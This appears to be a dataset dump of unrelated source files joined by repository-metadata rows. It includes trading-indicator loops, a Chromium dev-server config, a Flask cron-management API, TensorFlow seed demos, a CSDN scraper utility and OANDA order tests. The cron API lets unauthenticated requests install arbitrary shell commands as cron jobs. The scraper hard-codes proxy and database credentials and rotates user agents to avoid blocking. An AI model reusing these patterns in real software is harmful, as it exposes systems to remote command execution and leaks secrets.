                low_point = low[i]
                af = af_step
            else:
                if high[i] > high_point:
                    # New extreme: accelerate, capped at max_af.
                    high_point = high[i]
                    af = min(af + af_step, max_af)
                # SAR may never enter the range of the previous two bars.
                if low[i-2] < psar[i]:
                    psar[i] = low[i-2]
                elif low[i-1] < psar[i]:
                    psar[i] = low[i-1]
        else:
            psar[i] = psar[i-1] - af * (psar[i-1] - low_point)
            if high[i] > psar[i]:
                # Price pierced the SAR: flip to an uptrend.
                reversal = True
                psar[i] = low_point
                high_point = high[i]
                af = af_step
            else:
                if low[i] < low_point:
                    low_point = low[i]
                    af = min(af + af_step, max_af)
                if high[i-2] > psar[i]:
                    psar[i] = high[i-2]
                elif high[i-1] > psar[i]:
                    psar[i] = high[i-1]
        # XOR flips the trend flag exactly when a reversal occurred.
        uptrend = uptrend ^ reversal
    return psar
@jit
def supertrend_loop(close, basic_ub, basic_lb, n):
    """Turn basic upper/lower bands into the final Supertrend line.

    Two-step band logic: the final bands only ratchet in the direction of
    the prevailing trend, and the supertrend rides whichever band the
    previous value was on, flipping when the close crosses it.  Entries
    before index ``n`` remain 0.
    """
    length = len(close)
    final_ub = np.zeros(length)
    final_lb = np.zeros(length)
    supertrend = np.zeros(length)
    for i in range(n, length):
        # Final upper band only moves down, unless price closed above it.
        final_ub[i] = (basic_ub[i]
                       if basic_ub[i] < final_ub[i-1] or close[i-1] > final_ub[i-1]
                       else final_ub[i-1])
        # Final lower band only moves up, unless price closed below it.
        final_lb[i] = (basic_lb[i]
                       if basic_lb[i] > final_lb[i-1] or close[i-1] < final_lb[i-1]
                       else final_lb[i-1])
        # Select the band the trend is currently riding on.
        if supertrend[i-1] == final_ub[i-1] and close[i] <= final_ub[i]:
            supertrend[i] = final_ub[i]
        elif supertrend[i-1] == final_ub[i-1] and close[i] > final_ub[i]:
            supertrend[i] = final_lb[i]
        elif supertrend[i-1] == final_lb[i-1] and close[i] >= final_lb[i]:
            supertrend[i] = final_lb[i]
        elif supertrend[i-1] == final_lb[i-1] and close[i] < final_lb[i]:
            supertrend[i] = final_ub[i]
        else:
            supertrend[i] = 0.00
    return supertrend
@jit
def fib_loop(n):
    """Return a slice of the Fibonacci sequence.

    Builds the first ``n + 1`` Fibonacci numbers starting from ``[0, 1]``
    and returns everything from index 3 on (i.e. 2, 3, 5, 8, ...).

    FIX: the original used a list comprehension purely for its ``append``
    side effect; a plain loop expresses the intent directly and does not
    build a throwaway list of ``None``.
    """
    fib = [0, 1]
    for _ in range(n - 1):
        fib.append(fib[-2] + fib[-1])
    return fib[3:]
| 24.866667 | 77 | 0.507507 |
3a8feafe3391c0ddd2f78fb39a9371d4374c0a73 | 1,441 | py | Python | netlog_viewer/netlog_viewer_build/netlog_viewer_dev_server_config.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 2,151 | 2020-04-18T07:31:17.000Z | 2022-03-31T08:39:18.000Z | netlog_viewer/netlog_viewer_build/netlog_viewer_dev_server_config.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 4,640 | 2015-07-08T16:19:08.000Z | 2019-12-02T15:01:27.000Z | netlog_viewer/netlog_viewer_build/netlog_viewer_dev_server_config.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 698 | 2015-06-02T19:18:35.000Z | 2022-03-29T16:57:15.000Z | # Copyright (c) 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import os
import netlog_viewer_project
import webapp2
from webapp2 import Route
def _RelPathToUnixPath(p):
return p.replace(os.sep, '/')
class TestListHandler(webapp2.RequestHandler):
  """Serves the list of test-module URLs for the project as JSON."""

  def get(self, *args, **kwargs):  # pylint: disable=unused-argument
    project = netlog_viewer_project.NetlogViewerProject()
    relpaths = []
    for module_path in project.FindAllTestModuleRelPaths():
      relpaths.append('/' + _RelPathToUnixPath(module_path))
    payload = json.dumps({'test_relpaths': relpaths})
    self.response.content_type = 'application/json'
    return self.response.write(payload)
class NetlogViewerDevServerConfig(object):
  """Dev-server configuration hooks for the netlog_viewer project."""

  def __init__(self):
    self.project = netlog_viewer_project.NetlogViewerProject()

  def GetName(self):
    """Short identifier for this server configuration."""
    return 'netlog_viewer'

  def GetRunUnitTestsUrl(self):
    """URL of the page that runs the unit tests in the browser."""
    return '/netlog_viewer/tests.html'

  def AddOptionstToArgParseGroup(self, g):
    # (sic) method name kept as-is: it is part of the public interface.
    # No extra command-line options are needed for this project.
    pass

  def GetRoutes(self, args):  # pylint: disable=unused-argument
    """Extra webapp2 routes served for this project."""
    return [Route('/netlog_viewer/tests', TestListHandler)]

  def GetSourcePaths(self, args):  # pylint: disable=unused-argument
    """Directories whose files the dev server should serve."""
    return list(self.project.source_paths)

  def GetTestDataPaths(self, args):  # pylint: disable=unused-argument
    """This project ships no test-data directories."""
    return []
| 26.2 | 72 | 0.727967 |
3a9084ba87c0f5c49b0d1b1f5827e460b297b88e | 3,991 | py | Python | src/app.py | eug/cron-rest | 2d0a2e0d0cf0cb464b71293802b85ac7076f9944 | [
"MIT"
] | 3 | 2021-05-10T13:42:59.000Z | 2022-03-28T02:07:23.000Z | src/app.py | eug/cron-rest | 2d0a2e0d0cf0cb464b71293802b85ac7076f9944 | [
"MIT"
] | null | null | null | src/app.py | eug/cron-rest | 2d0a2e0d0cf0cb464b71293802b85ac7076f9944 | [
"MIT"
] | 4 | 2018-05-12T13:43:00.000Z | 2021-10-30T01:23:00.000Z | # -*- coding: utf-8 -*-
import json
import os
from crontab import CronTab
from flask import Flask, request
from pathlib import Path
from pretty_cron import prettify_cron
app = Flask(__name__)
@app.route('/', methods=['GET'])
def home():
    """Serve the static index page bundled next to the app module."""
    index_path = Path(app.root_path + '/index.html')
    return index_path.read_text()
@app.route('/create', methods=['POST'])
def create():
    """Create a new cron job from POSTed ``pattern`` and ``command`` fields.

    Returns a JSON payload describing the new job, or a 'fail' payload
    when the command is empty or the pattern is not valid cron syntax.
    """
    pattern = request.form['pattern']
    command = request.form['command']
    # prettify_cron() returns its argument unchanged when it is not a valid
    # cron expression, so equality here means "invalid pattern".
    if not command or prettify_cron(pattern) == pattern:
        return json.dumps({
            'status': 'fail',
            'message': 'Some arguments are invalid.'
        })
    cron = CronTab(user=os.getenv('USER'))
    # The new job's id is its sequential index in the user's crontab.
    job_id = len(cron)
    job = cron.new(command=command)
    job.setall(pattern)
    cron.write()
    return json.dumps({
        'status': 'ok',
        'message': 'Job successfully created.',
        'job': {
            'id': job_id,
            'pattern': pattern,
            'command': command,
            'description': prettify_cron(pattern)
        }
    })
@app.route('/retrieve', methods=['GET'], defaults={'job_id': -1})
@app.route('/retrieve/id/<int:job_id>', methods=['GET'])
def retrieve(job_id):
    """Return one cron job (by index) or, with no id, every job as JSON.

    A negative ``job_id`` (the default route) means "list everything";
    an out-of-range id yields a 'fail' payload.
    """
    jobs = []
    cron = CronTab(user=os.getenv('USER'))
    if job_id < 0:
        # No id given: serialize the whole crontab.
        for i, job in enumerate(cron):
            pattern = job.slices.render()
            command = job.command
            description = prettify_cron(pattern)
            jobs.append({
                'id': i,
                'pattern': pattern,
                'command': command,
                'description': description
            })
        return json.dumps({
            'status': 'ok',
            'message': 'Jobs retrieved successfully',
            'jobs' : jobs
        })
    elif job_id < len(cron):
        # Valid index: serialize just that job (still as a one-item list).
        job = cron[job_id]
        pattern = job.slices.render()
        command = job.command
        description = prettify_cron(pattern)
        return json.dumps({
            'status': 'ok',
            'message': 'Job retrieved successfully',
            'jobs' : [{
                'id': job_id,
                'pattern': pattern,
                'command': command,
                'description': description
            }]
        })
    return json.dumps({
        'status': 'fail',
        'message': 'Job ID is invalid.'
    })
@app.route('/update/id/<int:job_id>', methods=['POST'])
def update(job_id):
    """Update the command and/or pattern of the cron job at ``job_id``.

    Either form field may be omitted; the existing value is kept.
    The returned ``description`` is only filled in when a new valid
    pattern was supplied, otherwise it is an empty string.
    """
    pattern = request.form['pattern'] if 'pattern' in request.form else None
    command = request.form['command'] if 'command' in request.form else None
    description = ''
    # NOTE(review): if 'command' is absent AND 'pattern' is absent, this
    # calls prettify_cron(None) — verify the library tolerates None input.
    if not command and prettify_cron(pattern) == pattern:
        return json.dumps({
            'status': 'fail',
            'message': 'Some argument must be provided.'
        })
    cron = CronTab(user=os.getenv('USER'))
    if job_id >= len(cron) or job_id < 0:
        return json.dumps({
            'status': 'fail',
            'message': 'Job ID is invalid.'
        })
    if not command:
        # Keep the existing command when none was supplied.
        command = cron[job_id].command
    cron[job_id].set_command(command)
    if pattern and prettify_cron(pattern) != pattern:
        # A new, valid pattern was supplied: apply and describe it.
        cron[job_id].setall(pattern)
        description = prettify_cron(pattern)
    else:
        # Otherwise report back the job's current schedule.
        pattern = cron[job_id].slices.render()
    cron.write()
    return json.dumps({
        'status': 'ok',
        'message': 'Job updated successfully.',
        'job': {
            'id': job_id,
            'pattern': pattern,
            'command': command,
            'description': description
        }
    })
@app.route('/delete/id/<int:job_id>', methods=['DELETE'])
def delete(job_id):
    """Remove the cron job at index *job_id* from the user's crontab."""
    cron = CronTab(user=os.getenv('USER'))
    # Guard clause: reject out-of-range ids before touching the crontab.
    if not 0 <= job_id < len(cron):
        return json.dumps({
            'status': 'fail',
            'message': 'Job ID is invalid.'
        })
    cron.remove(cron[job_id])
    cron.write()
    return json.dumps({
        'status': 'ok',
        'message': 'Job deleted successfully.'
    })
if __name__ == '__main__':
    # Start Flask's built-in development server (not for production use).
    app.run()
| 26.256579 | 76 | 0.540466 |
3a90d1f158c36003df58478dbdda2afff682b6b2 | 1,196 | py | Python | 2017/examples/05_randomization.py | limunan/stanford-tensorflow-tutorials | 51e53daaa2a32cfe7a1966f060b28dbbd081791c | [
"MIT"
] | 9,180 | 2017-07-27T23:43:41.000Z | 2022-03-29T17:10:14.000Z | 2017/examples/05_randomization.py | Nianze/stanford-tensorflow-tutorials | 51e53daaa2a32cfe7a1966f060b28dbbd081791c | [
"MIT"
] | 86 | 2017-08-04T12:38:38.000Z | 2020-12-09T03:34:02.000Z | 2017/examples/05_randomization.py | joshosu/stanford-tensorflow-tutorials | b16899102bf07964a15494452a2e91c1b9f88e46 | [
"MIT"
] | 4,115 | 2017-07-28T06:53:12.000Z | 2022-03-23T12:36:55.000Z | """ Examples to demonstrate ops level randomization
Author: Chip Huyen
Prepared for the class CS 20SI: "TensorFlow for Deep Learning Research"
cs20si.stanford.edu
"""
import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
import tensorflow as tf
# Example 1: session is the thing that keeps track of random state
c = tf.random_uniform([], -10, 10, seed=2)
with tf.Session() as sess:
print(sess.run(c)) # >> 3.57493
print(sess.run(c)) # >> -5.97319
# Example 2: each new session will start the random state all over again.
c = tf.random_uniform([], -10, 10, seed=2)
with tf.Session() as sess:
print(sess.run(c)) # >> 3.57493
with tf.Session() as sess:
print(sess.run(c)) # >> 3.57493
# Example 3: with operation level random seed, each op keeps its own seed.
c = tf.random_uniform([], -10, 10, seed=2)
d = tf.random_uniform([], -10, 10, seed=2)
with tf.Session() as sess:
print(sess.run(c)) # >> 3.57493
print(sess.run(d)) # >> 3.57493
# Example 4: graph level random seed
tf.set_random_seed(2)
c = tf.random_uniform([], -10, 10)
d = tf.random_uniform([], -10, 10)
with tf.Session() as sess:
print(sess.run(c)) # >> 9.12393
print(sess.run(d)) # >> -4.53404
| 27.813953 | 74 | 0.664716 |
3a91c8f71ed1bbfb503d86a5235097fd88dfae4a | 5,651 | py | Python | python-CSDN博客爬虫/CSDN_article/utils/myutils.py | wangchuanli001/Project-experience | b563c5c3afc07c913c2e1fd25dff41c70533f8de | [
"Apache-2.0"
] | 12 | 2019-12-07T01:44:55.000Z | 2022-01-27T14:13:30.000Z | python-CSDN博客爬虫/CSDN_article/utils/myutils.py | hujiese/Project-experience | b563c5c3afc07c913c2e1fd25dff41c70533f8de | [
"Apache-2.0"
] | 23 | 2020-05-23T03:56:33.000Z | 2022-02-28T07:54:45.000Z | python-CSDN博客爬虫/CSDN_article/utils/myutils.py | hujiese/Project-experience | b563c5c3afc07c913c2e1fd25dff41c70533f8de | [
"Apache-2.0"
] | 7 | 2019-12-20T04:48:56.000Z | 2021-11-19T02:23:45.000Z | # -*- coding: utf-8 -*-
'''
通用工具类
'''
import time
import MySQLdb
import jieba
import ast
import random, sys
# 日志类
import requests
sys.setrecursionlimit(1000000)
class Logger(object):
    """Tee logger: duplicates every write to a stream and to a log file.

    Intended to be assigned to ``sys.stdout``/``sys.stderr`` so that
    everything printed also lands in *filename* (opened in append mode).
    """

    def __init__(self, filename='default.log', stream=sys.stdout):
        # Keep the original stream so output is still visible on screen.
        self.terminal = stream
        # NOTE(review): the handle is never closed explicitly; it lives for
        # the lifetime of the Logger (acceptable for a process-wide log).
        self.log = open(filename, 'a', encoding='utf-8')

    def write(self, message):
        """Write *message* to both the terminal stream and the log file."""
        self.terminal.write(message)
        self.log.write(message)

    def flush(self):
        """Flush both targets.

        FIX: this was a silent no-op, which broke the file-object contract
        and could lose buffered log output when callers flush sys.stdout.
        (Dead commented-out print/flush/close code was also removed.)
        """
        self.terminal.flush()
        self.log.flush()
# 获得本地文件代理
def getproxyip(ip_file):
    """Read *ip_file* and return one randomly chosen proxy entry.

    The file holds one dict literal per line (e.g. "{'https': 'host:port'}");
    a random line is parsed with ast.literal_eval and returned as a dict.
    """
    with open(ip_file, 'r', encoding='utf-8') as handle:
        candidates = handle.read().split('\n')
    return ast.literal_eval(random.choice(candidates))
# 随机请求头
def randomheader():
user_agents = [
"Mozilla/5.0 (Windows NT 10.0; WOW64)", 'Mozilla/5.0 (Windows NT 6.3; WOW64)',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',
'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729;\
.NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; rv:11.0) like Gecko)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2) Gecko/2008070208 Firefox/3.0.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1) Gecko/20070309 Firefox/2.0.0.3',
'Mozilla/5.0 (Windows; U; Windows NT 5.1) Gecko/20070803 Firefox/1.5.0.12',
'Opera/9.27 (Windows NT 5.2; U; zh-cn)',
'Mozilla/5.0 (Macintosh; PPC Mac OS X; U; en) Opera 8.0',
'Opera/8.0 (Macintosh; PPC Mac OS X; U; en)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080219 Firefox/2.0.0.12 Navigator/9.0.0.6',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727;\
.NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Maxthon/4.0.6.2000\
Chrome/26.0.1410.43 Safari/537.1 ',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2;\
.NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729;\
Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E; QQBrowser/7.3.9825.400)',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 ',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) \
Chrome/21.0.1180.92 Safari/537.1 LBBROWSER',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; BIDUBrowser 2.x)',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) \
Chrome/20.0.1132.11 TaoBrowser/3.0 Safari/536.11'
]
user_agent = random.choice(user_agents)
headers = {
'User-Agent': user_agent,
'Connection': 'close',
}
return headers
'''
58.218.205.40:7754
221.229.196.234:6987
58.218.205.51:7038
58.218.205.57:2513
58.218.205.55:7817
58.218.205.52:5109
'''
# ip代理设置列表
ip_port = ["180.97.250.157:5147", "58.218.205.39:7893", "180.97.250.158:4107", "221.229.196.212:9311",
"221.229.196.212:6066", "221.229.196.192:6545",
"221.229.196.231:9975", "221.229.196.212:4953", "221.229.196.192:2133"]
# 代理服务器 阿布云
proxyHost = "http-dyn.abuyun.com"
proxyPort = "9020"
# 代理隧道验证信息
proxyUser = "HP48W550C1X873PD"
proxyPass = "FED1B0BB31CE94A3"
proxyMeta = "http://%(user)s:%(pass)s@%(host)s:%(port)s" % {
"host": proxyHost,
"port": proxyPort,
"user": proxyUser,
"pass": proxyPass,
}
# 爬虫
def spider(url, times=0):
    """GET *url* with a random User-Agent, retrying up to 6 times.

    Returns the ``requests`` response object on success, or the empty
    string after too many consecutive failures.

    FIX: the recursive retry's result was previously discarded (the call
    lacked ``return``), so every request that succeeded on a retry still
    returned ``None`` to the caller.  The unused ``proxies`` dict (built
    but never passed, since the proxied call is commented out) was also
    removed.
    """
    try:
        requests.packages.urllib3.disable_warnings()
        # Proxied variant, kept for reference:
        # response = requests.get(url, headers=randomheader(),
        #                         proxies={"http": proxyMeta, "https": proxyMeta},
        #                         timeout=20, verify=False)
        response = requests.get(url, headers=randomheader(), timeout=20, verify=False)  # no proxy
        requests.adapters.DEFAULT_RETRIES = 5
        s = requests.session()
        s.keep_alive = False
        return response
    except Exception as e:
        times += 1
        print("爬虫异常:" + url + "原因-:" + str(e))
        if times > 6:
            return ""
        time.sleep(random.randint(0, 9))
        print("重新爬取:" + str(times) + "===" + url)
        # BUG FIX: propagate the retry's result to the caller.
        return spider(url, times)
# 数据库更新语句执行操作
def sql_opt(databse, sql):
    """Execute one write statement against MySQL database *databse*.

    Commits on success; on failure prints the error and rolls back
    (errors are swallowed by design).  The connection is always closed.

    NOTE(review): credentials are hard-coded, and *sql* is executed
    verbatim — callers must never pass untrusted input here.
    (The misspelled parameter name 'databse' is kept: it is part of the
    signature.)
    """
    db = MySQLdb.connect("localhost", "root", "123456789", databse, charset='utf8')
    cursor = db.cursor()
    try:
        cursor.execute(sql)
        db.commit()
    except Exception as e:
        # Log and undo the partial transaction.
        print("sql_opt语句执行异常" + str(e) + "\n" + sql)
        db.rollback()
    db.close()
if __name__ == '__main__':
    # Ad-hoc manual check: pick one random proxy line from proxy_ip.txt
    # and print the resulting proxies mapping.
    print("test")
    fo = open("proxy_ip.txt", 'r', encoding='utf-8')
    port_list = fo.read().split("\n")
    fo.close()
    proxies = {
        "https": random.choices(port_list)[0],
    }
    print(proxies)
| 33.838323 | 121 | 0.599186 |
3a92948a079a2d3f3db1feb98db4697c887b4594 | 140 | py | Python | Contest/DDCC2020-qual/b/main.py | mpses/AtCoder | 9c101fcc0a1394754fcf2385af54b05c30a5ae2a | [
"CC0-1.0"
] | null | null | null | Contest/DDCC2020-qual/b/main.py | mpses/AtCoder | 9c101fcc0a1394754fcf2385af54b05c30a5ae2a | [
"CC0-1.0"
] | null | null | null | Contest/DDCC2020-qual/b/main.py | mpses/AtCoder | 9c101fcc0a1394754fcf2385af54b05c30a5ae2a | [
"CC0-1.0"
] | null | null | null | #!/usr/bin/env python3
from numpy import*
n, *a = map(int, open(0).read().split())
a = array(a)
print(int(min(abs(cumsum(a)-(sum(a)/2)))*2)) | 28 | 44 | 0.621429 |
3a948fad21b8a67c7efb20bb30784138fb309c60 | 11,836 | py | Python | oanda-api-v20-master/tests/test_contrib_orders.py | cdibble2011/OANDA | 68327d6d65dd92952d7a1dc49fe29efca766d900 | [
"MIT"
] | 389 | 2016-07-22T17:19:17.000Z | 2022-03-18T21:14:55.000Z | oanda-api-v20-master/tests/test_contrib_orders.py | cdibble2011/OANDA | 68327d6d65dd92952d7a1dc49fe29efca766d900 | [
"MIT"
] | 162 | 2016-10-04T18:17:48.000Z | 2021-12-22T10:53:54.000Z | oanda-api-v20-master/tests/test_contrib_orders.py | cdibble2011/OANDA | 68327d6d65dd92952d7a1dc49fe29efca766d900 | [
"MIT"
] | 120 | 2016-08-08T18:52:41.000Z | 2022-03-24T06:53:38.000Z | import unittest
try:
from nose_parameterized import parameterized
except:
print("*** Please install 'nose_parameterized' to run these tests ***")
exit(0)
import oandapyV20.contrib.requests as req
import oandapyV20.definitions.orders as OD
import oandapyV20.types as types
class TestContribRequests(unittest.TestCase):
"""Tests regarding contrib requests.
The reference is created using the second dict parameter. The
first dict parameter is merge with this, but only for the keys
that do NOT exist. That allows us to override parameters.
The result should reflect the data constructed by the class
"""
@parameterized.expand([
# MO
(req.MarketOrderRequest,
{"instrument": "EUR_USD",
"units": 10000}, # integer!
{'timeInForce': 'FOK', # the default
'units': '10000', # override, should be the str equiv.
'positionFill': 'DEFAULT',
'type': 'MARKET'}
),
(req.MarketOrderRequest,
{"instrument": "EUR_USD",
"priceBound": 12345, # integer
"units": "10000"},
{'timeInForce': 'FOK',
"priceBound": types.PriceValue(12345).value,
'positionFill': 'DEFAULT',
'type': 'MARKET'}
),
(req.MarketOrderRequest,
{"instrument": "EUR_USD",
'timeInForce': 'GFD', # should result in a ValueError
"units": "10000"},
{'positionFill': 'DEFAULT',
'type': 'MARKET'},
ValueError
),
(req.MarketOrderRequest,
{"instrument": "EUR_USD",
'timeInForce': 'FOK',
'positionFill': 'WRONG',
"units": "10000"},
{'positionFill': 'WRONG',
'type': 'MARKET'},
ValueError
),
# LO
(req.LimitOrderRequest,
{"instrument": "EUR_USD",
"units": 10000, # integer
"price": 1.08},
{'timeInForce': 'GTC',
"price": '1.08000',
'positionFill': 'DEFAULT',
'type': 'LIMIT'
}
),
(req.LimitOrderRequest,
{"instrument": "EUR_USD",
"units": "10000", # string
"price": "1.08"},
{'timeInForce': 'GTC',
"price": '1.08000',
'positionFill': 'DEFAULT',
'type': 'LIMIT'
}
),
# ... GTD, should raise a ValueError with missing date
(req.LimitOrderRequest,
{"instrument": "EUR_USD",
'timeInForce': 'GTD',
"units": 10000,
"price": 1.08},
{'timeInForce': 'GTD',
"price": '1.08000',
'positionFill': 'DEFAULT',
'type': 'LIMIT'},
ValueError
),
# MIT
(req.MITOrderRequest,
{"instrument": "EUR_USD",
"units": 10000,
"price": 1.08},
{'timeInForce': 'GTC',
"price": '1.08000',
'positionFill': 'DEFAULT',
'type': 'MARKET_IF_TOUCHED'}
),
# ... GTD, should raise a ValueError with missing date
(req.MITOrderRequest,
{"instrument": "EUR_USD",
'timeInForce': 'GTD',
"units": 10000,
"price": 1.08},
{'timeInForce': 'GTD',
"price": '1.08000',
'positionFill': 'DEFAULT',
'type': 'MARKET_IF_TOUCHED'},
ValueError
),
# ... FOK, should raise a ValueError (not allowed)
(req.MITOrderRequest,
{"instrument": "EUR_USD",
'timeInForce': 'FOK',
"units": 10000,
"price": 1.08},
{'timeInForce': 'FOK',
"price": '1.08000',
'positionFill': 'DEFAULT',
'type': 'MARKET_IF_TOUCHED'},
ValueError
),
# TPO
(req.TakeProfitOrderRequest,
{"tradeID": "1234",
"price": 1.22},
{'timeInForce': 'GTC',
"price": '1.22000',
'type': 'TAKE_PROFIT'}
),
# ... GTD, should raise a ValueError with missing date
(req.TakeProfitOrderRequest,
{"tradeID": "1234",
"timeInForce": "GTD",
"price": 1.22},
{'timeInForce': 'GTD',
"price": '1.22000',
'type': 'TAKE_PROFIT'},
ValueError
),
# ... FOK, should raise a ValueError (not allowed)
(req.TakeProfitOrderRequest,
{"tradeID": "1234",
"timeInForce": "FOK",
"price": 1.22},
{'timeInForce': 'FOK',
"price": '1.22000',
'type': 'TAKE_PROFIT'},
ValueError
),
# SLO
(req.StopLossOrderRequest,
{"tradeID": "1234",
"price": 1.07},
{'timeInForce': 'GTC',
'type': 'STOP_LOSS',
'price': '1.07000'}
),
# ... GTD, should raise a ValueError with missing date
(req.StopLossOrderRequest,
{"tradeID": "1234",
"timeInForce": "GTD",
"price": 1.07},
{'timeInForce': 'GTD',
'type': 'STOP_LOSS'},
ValueError
),
# ... FOK, should raise a ValueError
(req.StopLossOrderRequest,
{"tradeID": "1234",
"timeInForce": "FOK",
"price": 1.07},
{'timeInForce': 'FOK',
'type': 'STOP_LOSS'},
ValueError
),
# TSLO
(req.TrailingStopLossOrderRequest,
{"tradeID": "1234",
"distance": 20.5},
{'timeInForce': 'GTC',
"distance": '20.50000',
'type': 'TRAILING_STOP_LOSS'}
),
# ... GTD, should raise a ValueError with missing date
(req.TrailingStopLossOrderRequest,
{"tradeID": "1234",
"timeInForce": "GTD",
"distance": 20.5},
{'timeInForce': 'GTD',
'type': 'TRAILING_STOP_LOSS'},
ValueError
),
# ... FOK, should raise a ValueError (not allowed)
(req.TrailingStopLossOrderRequest,
{"tradeID": "1234",
"timeInForce": "FOK",
"distance": 20.5},
{'timeInForce': 'FOK',
"distance": "20.50000",
'type': 'TRAILING_STOP_LOSS'},
ValueError
),
# SO
(req.StopOrderRequest,
{"instrument": "EUR_USD",
"units": 10000,
"price": 1.07},
{'timeInForce': 'GTC',
'positionFill': 'DEFAULT',
"price": "1.07000",
'type': 'STOP'}
),
# ... GTD, should raise a ValueError with missing date
(req.StopOrderRequest,
{"instrument": "EUR_USD",
"units": 10000,
"timeInForce": "GTD",
"price": 1.07},
{'timeInForce': 'GTD',
'positionFill': 'DEFAULT',
"price": "1.07000",
'type': 'STOP'},
ValueError
),
])
    def test__orders(self, cls, inpar, refpar, exc=None):
        """Instantiate *cls* with *inpar* and compare its body to *refpar*.

        The reference body is *refpar* plus every *inpar* key it does not
        already define (stringified, since the API renders values as
        strings).  When *exc* is given, construction must raise it.
        """
        reference = dict({"order": refpar})
        # merge every input key the reference does not already override
        for k in inpar.keys():
            if k not in reference['order']:
                reference['order'][k] = str(inpar[k])
        if not exc:
            r = cls(**inpar)
            self.assertTrue(r.data == reference)
        else:
            with self.assertRaises(exc):
                r = cls(**inpar)
@parameterized.expand([
# regular
(req.PositionCloseRequest,
{"longUnits": 10000,
"shortUnits": 2000},
{"longUnits": "10000",
"shortUnits": "2000"},
),
# nothing
(req.PositionCloseRequest,
{},
{},
ValueError
),
# client ext
(req.PositionCloseRequest,
{"longUnits": 10000,
"shortUnits": 2000,
"longClientExtensions": {"key": "val"}
},
{"longUnits": "10000",
"shortUnits": "2000",
"longClientExtensions": {"key": "val"}
},
),
# client ext
(req.PositionCloseRequest,
{"longUnits": 10000,
"shortUnits": 2000,
"shortClientExtensions": {"key": "val"}
},
{"longUnits": "10000",
"shortUnits": "2000",
"shortClientExtensions": {"key": "val"}
},
),
# regular
(req.TradeCloseRequest,
{"units": 10000},
{"units": "10000"}
),
# default
(req.TradeCloseRequest,
{},
{"units": "ALL"}
),
# TakeProfitDetails
(req.TakeProfitDetails,
{"price": 1.10},
{'timeInForce': 'GTC',
'price': '1.10000'}
),
# .. raises ValueError because GTD required gtdTime
(req.TakeProfitDetails,
{"price": 1.10,
"timeInForce": OD.TimeInForce.GTD},
{'timeInForce': 'GTD',
'price': '1.10000'},
ValueError
),
# .. raises ValueError because timeInForce must be GTC/GTD/GFD
(req.TakeProfitDetails,
{"price": 1.10,
"timeInForce": OD.TimeInForce.FOK},
{'timeInForce': 'FOK',
'price': '1.10000'},
ValueError
),
# StopLossDetails
(req.StopLossDetails,
{"price": 1.10},
{'timeInForce': 'GTC',
'price': '1.10000'}
),
# .. raises ValueError because GTD required gtdTime
(req.StopLossDetails,
{"price": 1.10,
"timeInForce": OD.TimeInForce.GTD},
{'timeInForce': 'GTD',
'price': '1.10000'},
ValueError
),
# .. raises ValueError because timeInForce must be GTC/GTD/GFD
(req.StopLossDetails,
{"price": 1.10,
"timeInForce": OD.TimeInForce.FOK},
{'timeInForce': 'FOK',
'price': '1.10000'},
ValueError
),
# TrailingStopLossDetails
(req.TrailingStopLossDetails,
{"distance": 25},
{'timeInForce': 'GTC',
'distance': '25.00000'}
),
# .. raises ValueError because GTD required gtdTime
(req.TrailingStopLossDetails,
{"distance": 100,
"timeInForce": OD.TimeInForce.GTD},
{'timeInForce': 'GTD',
'distance': '100.00000'},
ValueError
),
# .. raises ValueError because timeInForce must be GTC/GTD/GFD
(req.TrailingStopLossDetails,
{"distance": 100,
"timeInForce": OD.TimeInForce.FOK},
{'timeInForce': 'FOK',
'distance': '100.00000'},
ValueError
),
# ClientExtensions
(req.ClientExtensions,
{"clientID": "myID"},
{"id": "myID"},
),
(req.ClientExtensions,
{"clientTag": "myTag"},
{"tag": "myTag"},
),
(req.ClientExtensions,
{"clientComment": "myComment"},
{"comment": "myComment"},
),
# .. raises ValueError because no values were set
(req.ClientExtensions,
{},
{},
ValueError
),
])
    def test__anonymous_body(self, cls, inpar, refpar, exc=None):
        # Parametrized check: construct `cls` from `inpar` and verify its
        # serialized `.data` equals `refpar`; when `exc` is supplied the
        # construction itself must raise that exception.
        if not exc:
            # No-arg construction when inpar is empty exercises defaults.
            r = cls(**inpar) if inpar else cls()
            self.assertTrue(r.data == refpar)
        else:
            with self.assertRaises(exc):
                r = cls(**inpar)
